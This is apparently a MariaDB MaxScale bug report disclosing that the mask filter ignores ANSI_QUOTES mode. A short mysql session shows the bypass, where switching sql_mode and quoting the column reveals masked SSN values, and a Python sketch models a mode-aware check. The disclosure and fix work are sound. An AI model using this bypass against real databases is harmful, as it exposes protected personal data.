  1. MariaDB MaxScale
  2. MXS-2457

MaxScale Mask Filter incorrectly handles ANSI_QUOTES

    Details

    • Sprint:
      MXS-SPRINT-81

      Description

      The query classifier does not take into account ANSI_QUOTES mode, allowing a malicious user to bypass firewall filter rules.

      mysql> select concat(ssn) from managers;
      ERROR 1141 (HY000): The function concat is used in conjunction with a field that should be masked for 'maxuser'@'::ffff:127.0.0.1', access is denied.
       
      mysql> set @@sql_mode = 'ANSI_QUOTES';
      Query OK, 0 rows affected (0.00 sec)
       
      mysql> select concat("ssn") from managers;
      +---------------+
      | concat("ssn") |
      +---------------+
      | 111-22-3333   |
      | 444-55-6666   |
      +---------------+
      2 rows in set (0.00 sec)
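
A mode-aware version of the check involved here, as an added example that is not MaxScale's code and not part of the original report: a small Python model that tracks `sql_mode` per session and treats a double-quoted token as an identifier once ANSI_QUOTES is active. The `Session` class, its tokenizer and all method names are hypothetical; `track_mode=False` models a classifier that ignores the mode.

```python
import re

# Constructed tokenizer for illustration; this is not MaxScale's query classifier.
TOKEN = re.compile(r"""
    (?P<bq>`(?:[^`]|``)*`)          # `x`: always an identifier
  | (?P<dq>"(?:[^"\\]|\\.|"")*")    # "x": string literal, or identifier under ANSI_QUOTES
  | (?P<sq>'(?:[^'\\]|\\.|'')*')    # 'x': always a string literal
  | (?P<word>[A-Za-z_@][\w@$.]*)    # bare word: keyword, function name or identifier
  | (?P<punct>\S)
""", re.X)
SET_MODE = re.compile(
    r"^\s*set\s+(?:session\s+|@@(?:session\.)?)?sql_mode\s*=\s*'([^']*)'", re.I)


class Session:
    """Per-client state for a proxy-side check (hypothetical class)."""

    def __init__(self, masked_columns, track_mode=True):
        self.masked = {c.lower() for c in masked_columns}
        self.track_mode = track_mode   # False models a classifier that ignores sql_mode
        self.ansi_quotes = False

    def observe(self, query):
        m = SET_MODE.match(query)
        if m and self.track_mode:
            modes = {x.strip().upper() for x in m.group(1).split(",")}
            # ANSI is a combination mode that includes ANSI_QUOTES; other
            # combination modes are not handled here.
            self.ansi_quotes = bool(modes & {"ANSI_QUOTES", "ANSI"})

    def columns_in_calls(self, query):
        """Identifiers that appear inside the parentheses of a function call."""
        found, stack, prev = set(), [], None
        for m in TOKEN.finditer(query):
            kind, text = m.lastgroup, m.group()
            if text == "(":
                stack.append(prev == "word")   # True when a name precedes "("
            elif text == ")" and stack:
                stack.pop()
            elif any(stack) and (kind in ("bq", "word")
                                 or (kind == "dq" and self.ansi_quotes)):
                found.add(text.strip('`"').lower().rsplit(".", 1)[-1])
            prev = kind
        return found

    def is_blocked(self, query):
        self.observe(query)
        return bool(self.columns_in_calls(query) & self.masked)
```

Feeding both sessions the three statements from the report in order shows the difference: only the session that tracks the mode rejects `concat("ssn")` after the `SET`.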
      

            People

            Assignee:
            johan.wikman Johan Wikman
            Reporter:
            ctarquini Christopher Tarquini